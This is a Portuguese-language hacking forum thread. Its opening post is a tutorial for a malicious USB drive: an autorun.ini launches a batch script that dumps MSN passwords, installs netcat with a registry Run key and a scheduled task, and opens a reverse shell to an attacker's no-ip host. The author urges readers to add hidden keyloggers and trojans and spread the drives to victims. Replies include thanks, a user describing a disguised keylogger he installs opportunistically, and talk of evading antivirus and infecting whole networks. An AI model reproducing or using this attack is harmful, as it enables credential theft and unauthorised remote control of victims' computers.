Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Pendrive Hacker

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Tutorial Pendrive Hacker

    Bom acho q todo nós temos que ter um desses.
    Então vou ensinar a fazer um simples pen drive que vai permitir você invadir por conexão reversa, instalar um keylloger e pegar a senhas do MSN da vítima.

    Crie o arquivo autorun.ini
    Código:
    [autorun]
    open=launch.bat
    action=Autoexecução da Pendrive
    icon=icone.ico          //se vc quiser por um icone
    label=meu pen drive
    shell\open\command=launch.bat
    shell\open\command=winupdate.exe     //se vc quiser por seu keyloger ou trojan
    shell\open=meu pen drive
    Em seguida vamos criar o arquivo lauch.bat
    Código:
    @echo off
    @break off
    
    
    start mspass\mspass.exe /stext mspass.txt
    copy nc.exe c:\windows\system32
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run  /v NC /d "at 13:00 nc.exe winupdateversion.no-ip.info 1500 -e cmd.exe"
    start c:\windows\system32\nc.exe winupdateversion.no-ip.info 1500 -e cmd.exe 
    at 13:00 nc.exe winupdateversion.no-ip.info 1500 -e cmd.exe
    Agora que você possui esses dois arquivos, coloque-os dentro do pen drive. No pen drive coloque tmb uma pasta chamada mspass com o mspass.exe dentro.
    E obviamente, coloque o nc.exe

    E use a critividade. Se quiser colocar mais trojans e keyllogers adicione as linhas de comando para copiá-los para o PC da vítima. Lembrem-se de deixá-los indetectáveis, para não acabar com a graça.
    Agora basta você espalhar par quem vc quiser. Assim que a pessoa colocar o pen drive e tentar abri-lo vc terá as senhas do MSN, uma computador para invadir e um relatório de seu keylloger ;D

    E se quiser tmb ande com seu pen drive. Sempre que ver uma máquina de seu interesse basta colocá-lo e apertar enter.
    Eu ando com o meu dependurado na minha corrente rrsrsrsrs xD

    Vou deixar para baixar todos os arquivos aqui. O keylloger/trojan fica por conta de vcs.
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    Espero que gostem.
    Quanto mais aprendo mais vejo o tamanho da minha ignorânica.
    sigpic

  • Font Size
    #2
    5k4ll Obrigado por compartilhar!
    sigpic



    Comment


    • Font Size
      #3
      vlw

      obrigado por compartilhar...

      Comment


      • Font Size
        #4
        Tosco mais legal
        ...

        Comment


        • Font Size
          #5
          Tutorial muito bem feito vlw vou tentar usar em uma máquina xD

          Comment


          • Font Size
            #6
            Postado Originalmente por 5k4ll Ver Post
            E use a critividade. Se quiser colocar mais trojans e keyllogers adicione as linhas de comando para copiá-los para o PC da vítima. Lembrem-se de deixá-los indetectáveis, para não acabar com a graça.
            Agora basta você espalhar par quem vc quiser. Assim que a pessoa colocar o pen drive e tentar abri-lo vc terá as senhas do MSN, uma computador para invadir e um relatório de seu keylloger ;D

            E se quiser tmb ande com seu pen drive. Sempre que ver uma máquina de seu interesse basta colocá-lo e apertar enter.
            Eu ando com o meu dependurado na minha corrente rrsrsrsrs xD

            Vou deixar para baixar todos os arquivos aqui. O keylloger/trojan fica por conta de vcs.
            Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
            Espero que gostem.
            gostaria de saber exatamente como eu devo fazer pra colocar outros trojans, pois não estou conseguindo


            > aproposito eutou andando com meu kingston 4G no pendurado na correntinha tbm....rsrrsrsrs


            no pen drive estou carregando um server do ardamax devidamente camuflado e sempre que rola uma oportunidade eu instalo



            >> ainda aproposito dos tojans eu queria saber se é possivel eu contaminar varias maquinas de uma mesma rede com uma só instalação > tipo: instalar em uma maquina e fazer o trojam espalhar pra rede toda


            velew

            Comment


            • Font Size
              #7
              Muito bom, obrigado!

              Comment


              • Font Size
                #8
                Postado Originalmente por MateusNR Ver Post
                Tosco mais legal
                Tosco? Defina tosco...
                Pode ser simples mesmo, mas é muito útil.
                Quanto mais aprendo mais vejo o tamanho da minha ignorânica.
                sigpic

                Comment


                • Font Size
                  #9
                  s

                  na moral mesmo? nao entendi nada =s

                  entendi tudo que você disse e tal, o que é pra fazer etc, o que eu não entendi foi o script que você fez cara =s , que linguagem é essa pra fazer esses comandos? queria saber pra poder estudar e fazer os meus ;d

                  tem alguma video aula ou tutorial sobre isso?

                  fico no aguardo de resposta, desde já eu agradeço!!

                  abraços.
                  "Você pode ter a fé que quiser em espíritos, em vida após a morte, no paraíso e no inferno, mas se tratando desse mundo, não seja idiota. Porque você pode me dizer que deposita sua fé em Deus para passar pelo dia, mas quando chega a hora de atravessar a rua, eu sei que você olha para os dois lados"

                  Comment


                  • Font Size
                    #10
                    é de fácil detecçaõ isso, na prática é muito difícil funcionar, qlqr av pega os autorun, mas ta bom o tuto.

                    Comment


                    • Font Size
                      #11
                      haeihaiehiaheihahe
                      Cara eu tive que desenvolver isso sozinho...
                      aprender como os virus de pendrive funcionavam e tal, pra conseguir fazer isso
                      e agora vem um poste...
                      eu teria ganhado muiiiiito tempo se eu conhece-se esse poste antes...

                      Isso é muito bom... e funciona mesmo...
                      valeu o poste mano, concerteza o pessoal vai gostar, valeu o poste e continua assim, que tá ótimo. abç.
                      Não Acha Estranha Essa Frase:
                      Eu Sou Hacker e Uso Windows XP!

                      Use Débian, Aprenda Slackware e Brinque Muito Com Back|Track


                      Fã ->Nickguitar.dll


                      Quer ajudar nossso fórum e não sabe como?
                      Então click na imagem e ajude-nos com os links off

                      Comment


                      • Font Size
                        #12
                        Postado Originalmente por edyzao Ver Post
                        na moral mesmo? nao entendi nada =s

                        entendi tudo que você disse e tal, o que é pra fazer etc, o que eu não entendi foi o script que você fez cara =s , que linguagem é essa pra fazer esses comandos? queria saber pra poder estudar e fazer os meus ;d

                        tem alguma video aula ou tutorial sobre isso?

                        fico no aguardo de resposta, desde já eu agradeço!!

                        abraços.
                        O script é simples, feito no bloco de notas mesmo com comandos do prompt ai se sala em .bat
                        Pode se fazer a mesma coisa em linguagens como C criando um arquivo executável.
                        Fica da sua escolha.
                        N conheço nenhuma video aula, mas se achar posta ai.
                        Se quiser aprender mais como mexer proucure por programaçao em Batch

                        é de fácil detecçaõ isso, na prática é muito difícil funcionar, qlqr av pega os autorun, mas ta bom o tuto.
                        Gostaria que você me informasse qual antí-vírus está detectando isso, pra eu dar uma pesquisada de como burlar isso.

                        O que eu sei é que eles detectavam uma autoexecução completa em pen drives. A microsoft até bloqueou essas autoexecuções.
                        Nesse caso ai o que acontece é que abre uma janela com as opções a sua escolha e na primeira é a autoexecução. Ou quando a pessoa tenta acessar o pen drive ele se autoexecuta.

                        Eu ultilizo isso direto e ainda n tive problemas, ressalto o caso do AVG que detecta o nc.exe
                        De resto se os trojans/keyllogers estiverem bem camuflados tudo passa numa boa.
                        Quanto mais aprendo mais vejo o tamanho da minha ignorânica.
                        sigpic

                        Comment


                        • Font Size
                          #13
                          Primeiramente ótimo post gostei muito mesmo!


                          Postado Originalmente por edyzao Ver Post
                          na moral mesmo? nao entendi nada =s

                          entendi tudo que você disse e tal, o que é pra fazer etc, o que eu não entendi foi o script que você fez cara =s , que linguagem é essa pra fazer esses comandos? queria saber pra poder estudar e fazer os meus ;d

                          tem alguma video aula ou tutorial sobre isso?

                          fico no aguardo de resposta, desde já eu agradeço!!

                          abraços.
                          Cara tudo issó é feito no bloco de notas usando os comandos do prompt, se eu entendi bem basicamente o autorun vai executar esses arquivos no momento que você colocar o seu pen-drive no pc da vitima, fazendo assim instalar automaticamente um KL,trojan no pc conforme você configure!
                          ________________

                          Comment


                          • Font Size
                            #14
                            mano oque seria esse nc.exe?

                            e esse winupdateversion.no-ip.info .. eu devo configurar com a minha acc?

                            pots to perdidao

                            Comment


                            • Font Size
                              #15
                              Windows nenhum abre mais os autorun.
                              Depois de um tempo pra cá que estava dando muito virus eles bloquearam.
                              Ja testei isso, um tempo atrás, nao funcionou ;s

                              sigpic

                              "Conhecimento não é crime, crime é o que você faz com ele."
                              "Nunca deixe te dizer que você não é capaz"
                              "Vocês podem me acorrentar, torturar e até destruir meu corpo, mas nunca aprisionaram minha mente"




                              Full Access Defacer


                              e-mail & msn: warlockowned@yahoo.com.br


                              Comment

                              X
                              Working...
                              X